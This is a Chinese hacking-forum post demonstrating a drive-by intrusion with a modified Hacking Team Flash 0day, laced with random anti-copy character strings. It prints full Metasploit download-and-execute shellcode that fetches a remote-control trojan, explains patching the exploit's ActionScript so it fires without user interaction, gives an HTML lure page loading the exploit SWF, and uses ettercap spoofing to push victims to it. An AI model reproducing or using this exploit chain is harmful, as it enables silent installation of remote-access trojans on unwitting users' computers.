找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1360|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. U! X" g8 E* o0 W4 [- b 三、flash 0day之手工代码修改制作下载者实例入侵演示 + ^+ U Q* s$ f4 @3 F8 m: ~

5 R! x% w8 V9 x6 e$ t

" r" W, j4 J: a6 v. X" a/ V0 Z7 C" f; ^5 k 利用到的工具: 3 O9 O9 Y$ K8 t( ?8 z

b! D: c+ g- q9 I2 U! m( T" Z

4 P A5 R. f m. h% l' R. U, S Msf ( \3 z9 u9 F9 @. l s' G- C' c0 w

1 V9 F6 e* e$ f9 a& ^+ l

! Y1 D' Q0 ~& D Ettercap & K- O* q8 H- g5 m9 e% H5 q

9 X5 f J' }/ A# w- I; A

* K* N/ \* J" U Adobe Flash CS6 % g, A. T5 Y1 a

' a0 x4 A' @; L; H: T

8 r; _) y2 ^$ Y# ?, x2 o+ y1 E0 C: S Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 - A5 b" j7 w7 Q6 h

7 j0 A5 P5 z, j ~9 Q! w7 H- D9 t

% d' |: ?# U) D5 V. L" e 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options . B( E1 s/ T7 Q. P9 b( g1 U

- x! m2 L0 v0 x! u( o( m

% t5 P$ N0 Q9 s' n2 T 如图: 1 c5 X. n5 q' \

+ B; h5 ^9 O/ S- V! q/ h

' z& s9 I. f, K7 b5 H# e. W+ v   $ F5 C% Q; X% E8 z1 d* a6 q# O; a

3 Z p5 | N, t+ A) b

. X$ H, V) d" ]/ W3 E' v   ' m0 T9 ^* Y$ d

8 O9 o' f6 B* b9 d7 v

& N z5 B; p6 s( v 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' o& L) X4 H$ W% |1 g" R3 l

+ f8 V) J* f- ~2 r9 y- b3 |+ O+ s- s

* g1 H+ M# h+ ~0 {& W   ' v3 V3 i; u7 L

, R- Y+ o4 o" l3 h

: g. D/ t ^& n+ R6 f   + t x- P5 \* c2 g' c

8 E0 T' ]2 M$ _7 T* h- v

$ J# m) _( x$ j: F7 } 然后执行generate -t dword生成shellcode,如下: 2 W2 k0 M' Y" @& X, x! q* y

% h& J5 A: U/ v0 ]! j) J' g

2 ?0 \: h2 {" G2 w( ^ o& b3 G   6 |& h7 A( y; B( h9 Y. H+ I$ M8 ~

- m% k- l/ h5 x$ m0 I

( ^$ z2 Z; s+ i6 c: @ ]( A& l 复制代码到文本下便于我们一会编辑flash exp,如下: : i* j- S5 ^) a q

0 g. o/ w4 s1 h. a1 i- N

; C6 t1 i2 o# F6 @6 Q3 D 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 t4 f" j: Q0 I$ c

+ j. n9 q2 l2 ~5 ^8 G% C

+ W0 X/ E- j" H4 K# Y# {2 C 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, # p, j0 R7 F) n4 ]6 L0 C+ ]0 w b% _7 Q

4 K- R- a+ R! Y

( _' q; e; c4 K& e' S) p' P 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 9 }4 m. q7 j6 \/ q7 m$ h. a- v

" C( f0 J# e8 H: M" ~$ F5 q2 u8 O

. i. M7 q% P1 n6 ~9 C" U+ q8 c3 i 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, - l, ~8 z! S% A2 V1 Y, F

+ k: m% @! C5 W& l

7 f$ V/ {% d( V' J: f5 Y 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, + K: T) u& l8 ^' T2 f

: Z, x+ p6 N! _, x5 l) A

; I; n9 h8 ]# d" ]% y& a. C% Q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 6 y) A7 k* @) s) `

8 O& ^8 w: \; d. b! A. C: y

' l, d) ?# a- G0 J$ H 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 5 h \$ S. B2 c7 k2 p7 p

9 Q [: c0 }6 v" T) B

, ~% I' ]0 o: F {6 }# l& g6 | 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' A5 U: g0 e1 h5 J6 s5 u F

- y# W, L' {% J! h/ F8 X4 O

) P* C- H" M$ K" ?! Q/ C7 G9 ^ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, + d) g# r* o! Z2 ~, I! G/ ?

$ p/ M( A( L; m1 O/ K$ Q

" W6 X0 d. C1 ?5 o/ `: b0 c 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' }; \' _+ I* M

3 g' C; `. e+ z5 q" z- ]

- M% q! u; a! w Q) _! S 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 3 |4 e$ c$ m) \5 e0 a

0 ^8 F; B& X" a! h) o W

7 V, A9 y0 W' R. r/ l4 ` 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 4 R8 v& H8 V* `# x+ ]; C

, O6 F" P) J; h5 N

8 k; }4 I; x4 O# J5 {; h4 b 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, : p0 \% c I& }& T+ g' |3 M) }

. c8 j$ ]& ~4 j8 l9 x, v: o9 p& k1 B' A

" e) v& v, @* {" p' R 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # M" [4 R, n. z2 w! @3 n+ J7 _' o

6 s# m: m4 u' T6 F! o

! C- y& W6 `# |8 W ?& ^   : _( [8 }% I2 ?1 T% \

- t" L# t7 N5 \" {# O

# R6 G/ l6 u: y* c   4 @: S5 g& m. Q8 ]* f; |" I, G

! k% C6 c5 |, q7 c% v

- \; r$ N8 p5 z# b$ \ 下面我们来修改flash 0day exp,需要修改三个文件,分别为: % a# ], z* H# |

, M* H7 b- J: L/ l

/ H5 m, f8 H$ @( D, J8 X6 v   # k: P+ o/ o+ \1 N, B0 F: {, `1 ]( k

6 P9 A- h6 J5 P+ V

. J- U# L5 O& Y 先修改ShellWin32.as,部分源代码如图: 0 K9 f& s$ _# l! _/ v

) ]0 G3 n+ ~& ?

4 x8 {3 @9 t+ l! Y0 ]   / ~% H4 F- L5 U! p

7 D, ~3 k0 v A7 M- Z- ]

/ N! X1 _/ m+ U) M: [- P 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: : [) t0 R- c+ Z# ~ M* k6 m( k

1 y9 z0 H1 ~6 N5 w) q/ S" |( b

$ E% ]7 w$ y p1 A, H   ( `( U* k: ] [9 M4 x5 m

3 B5 O. E6 b: A3 }7 B

8 T% w6 _" P( A3 {, _ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 n5 H4 o) a. E+ T) U

" V( N% N6 Y& C) _; o( o

/ d3 Q. A; R/ `! c* ^ ]# N* I   " C" x4 q/ E4 w- P1 B z

3 A4 `8 ~& K, K8 B: c5 ~- J$ ]. P

, g7 o* k& Y9 D2 T 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: * s# r! y0 G' q4 I( U1 m0 u

- j6 Q$ O1 Y6 f4 Z0 f( d( s; \: ?+ E

: ?; P* i+ x3 _& z! _   / j' E0 Z/ _/ L0 ~, n

3 c* s7 a" K- V6 \9 V

% y% j% C b) |1 T7 o/ o   / B7 U4 o" n! T( g

; u0 U% U) y& U8 J! V& b2 \

1 b) j) M9 ]6 s! c h/ {. ]* a   & [8 @! A. y8 C: }

7 O& J% h" @& k! n2 ?$ K

; ^2 ?/ u, M/ T 然后点保存,下面我们来编译一下,打开 ; X& O7 R; p7 j% L. p

4 @& M) E* t& R" t" B- H/ k4 A

6 F, F5 {1 s* C: z exp1.fla然后点文件-发布,看看编译没错误 $ Z) y9 K2 v1 z, t- R6 F/ H

- {+ o0 l$ O2 M

- h+ N0 p; Q. x! O" I   , o+ O- X8 Z9 x8 a9 m0 C

w9 Q/ s0 ?/ X" y0 i U$ M/ R

" {" r) f1 m: V# Z5 K) W. n& t5 S' \   4 O9 V, m; X7 r, ~) \. J @3 O

1 {: @7 h2 K8 k( l+ ?8 H

% U. P' M) D- G   , l- u7 l/ d. K* U5 b0 n: ^

) I. O, r8 z# S# W- O

6 ~9 F2 Z, l Y2 T$ l- H. x: x" a5 n" I   / Z* k# i) C" v9 O$ P3 M. T

7 c9 e+ ]' G: Z" B3 x

: j7 A" R+ e4 u6 v6 ~/ f 然后我们把生成的 7 g8 ?& P/ o P; ]4 p; e

+ i3 \2 Y& u% P# ~* v, i

" {: d# ^) F2 i0 ^/ S) O; K exp1.swf丢到kailinux /var/www/html下: ! [) o% y' z* q" y5 m% R: H9 r

$ |" Y% g, L7 T" i1 n, |+ J; n

, I$ Z. U- k6 [$ e0 j 然后把这段代码好好编辑一下 + T' b U/ g" p5 u) n, v0 T

. p9 ~, O9 P$ R# A

# ?6 i6 x9 { h% ^   5 f& E4 [8 y' Z F$ X k

% i$ A. c% D# b/ F& \/ B

, P2 f: E( T$ L$ r0 ]3 r9 j   , i9 F' S0 Y: I) p0 B; _

8 d5 ^; S; B5 }; \

, y1 d' `& c3 x$ J. q   . v' G# w% M4 \- g& Q, N

c1 @* r& K8 Z; W, N* s

) Z; [# A& m; R4 ]4 l   6 v6 C* K0 `5 Y6 z$ ]5 F% H

: k; `& n' v) m* J- E; X

9 a. X! y" v l8 V; {   + W% Q' c8 t2 K! n' o! a7 n/ V( Q

6 U7 N8 I, _9 P3 I8 g: X

; f$ A2 d6 K9 j9 W4 C   " ?! X0 U Q5 F3 H3 Y% ^! E

+ @8 ?, _5 e" Q

5 k5 b Z( Y0 b+ Y <!DOCTYPE html> 5 A% B" E& A0 D$ p

" X3 \+ n% \% [- P

8 f+ c6 T9 |# G6 v- d! J <html> 7 h2 e+ r4 }$ o- z1 z

$ t* o; m6 x& i0 a) w* F# ?

4 H: A. Z/ |2 X <head> - w+ P! p. m5 t; Q, Q

! n1 e4 e. U# V/ I( P J* Q; @0 p

# ~/ }* f& R2 d) r$ a. {; m <meta http-equiv="Content-Type" content="text/html; X- D6 p- j$ K- z2 |

# ~2 g# h6 x' H) h i

& f3 U0 J) \' h* n; H' q charset=utf-8"/> ( h; N7 G4 c* {9 Z5 X( W

5 _+ g4 r( c& U3 E, ]- b& b0 K

- b% B9 b6 p4 Z# e! G </head> ' g; y1 @3 u, q/ r

& Q- U) ]! [2 _4 Q8 C+ N; m& o

3 `# S1 y9 M* D5 r/ P, ^ i <body> 4 p7 ~2 w( n: Z' j8 u

9 t5 p7 i5 I+ U- r7 e

% o }5 w& N7 A% k& U$ V <h2> Please wait, the requested page is loading...</h2> + _5 J- [0 j. \

/ P% Q: u V. p7 L5 u

# V7 r, I; q; e <br> ; R" x: C8 L Q) _, R

. w' q2 _& U. _

! M* L9 w' L. c2 ?2 U <OBJECT ! Q% m( h1 ^ ^- {

" h. [6 n# q% ]- G* M

+ v0 t# e5 \$ U classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie . S) n l1 X e& x: J7 B

u/ }! ^% {4 K' @# s1 p

0 o4 C, a' @& e0 E VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ; H) G! y7 O1 D9 v1 F8 v- v

G" I, o) n3 h5 v& I$ j8 ~) e

$ W' a2 v O8 H8 z/ n </body> ; R8 d; K' F8 h0 t* t

8 n" h+ \& k o

, _( f4 j' w+ z) P <script> 1 Z7 l6 j- R/ P

5 G1 ^; D. i; {5 t+ S& r' K

( J3 A% G2 p9 d, K/ E4 s9 E     setTimeout(function () { ) ^5 q' e4 T% Q: \

: }2 D" X9 H; T1 p

b8 X; M. [ I" V9 h) H: l          4 O( I p7 F; F3 a, E; s: `! n

: E. r( y. x6 I" o+ s

- y* j5 L4 c, B9 N window.location.reload(); 7 G' y2 Y; }" m) {: G7 H; A

. p$ }6 y4 P4 v Y* L# y- n

: i& V% n1 z$ l. B& w$ i     }, 10000); ! n6 Q! x% j! v! _! Q( g

) C# _0 }# g1 k& N& {

$ j. y: N M- L# t   1 U' r, \2 ~0 n# i0 A5 E G# M

, F4 T1 [1 N. d2 ]* m1 v/ ]

0 G1 R. _+ L. i/ K+ V </script> , |) r# l ~ I# V

; ?: i1 P" I4 k+ o

T1 y% f( i& B( v* @; \! A, h </html> - R4 Z/ i" a" `& Q. d; M) M; C, _

* Y" i9 |! C+ _$ b7 N' W6 \2 V

+ U% W; a! V5 w( A# u   - N$ A- f& a5 Y6 H6 o0 \0 c) l2 U, e

# G( t5 ^& t/ t v" A5 ]

) b- l+ s/ O( x: U( G 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: % Z: x: m: p. _& k2 {

5 h4 F! v) k( U7 M5 M! ]

0 _8 W$ J: }& S9 Q. f   ' ?; O \, D! I5 R6 x. X4 C

8 S; v9 v( N$ b# a, X

$ M( i& c6 I3 s   1 c( x4 s0 j8 t' v

4 x( V, ~8 y) I% L# A

+ b( Y( W, Q# x8 N! Q   2 H' l V7 T7 p

; J+ B( e G, q3 s5 F

- M' y8 W: p- a R }3 J   ( T1 \! ]8 i- H% |) n3 P

0 o* u8 t) ?; _5 R1 R+ b. s, h

4 Q* V* _ @' a- V9 j( z' E   " |: \& `+ g3 C* A5 _. _* ~( V

) j5 x3 G. g: l5 @

- H$ U3 F ^# \* U0 @ 下面我们用ettercap欺骗如图: + k. n: j# T$ [7 G% z! ^% l

, O/ A: W+ P. p5 E! l+ t8 n' h

0 Z3 [4 n. l0 ^   " Q; t* C' Q4 \; |) R8 b

* E% r% r$ n/ |, R0 K

6 B5 {0 L- i- N2 ~! Z- S   / p% @, i2 V) _1 D- h+ e# c0 ?

, y' C$ P4 v s9 w: H, U. R: `

7 z2 B' ~8 R" i4 L; n9 O, Y 下面我们随便访问个网站看看: 4 w1 d0 F* U# N

, v+ G! ]3 p1 E* S& c4 n0 g

: L1 C( d, U: n 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: * [- S K( z7 n2 r

9 m7 w) Y$ X) L$ L9 q' B- b9 B8 R

0 w, h$ N0 s! E7 q   2 R; t2 z# d8 z

) e# ? D: s6 ^: M% J

: u2 N A U8 m, B( G; P+ z! A5 {: r 我们看另一台, 4 m( u9 H, N2 m# B- I

& n9 P/ j' p, r

+ ?3 j" I& [% I8 \- O# e 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 % u% P5 i6 b6 j

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表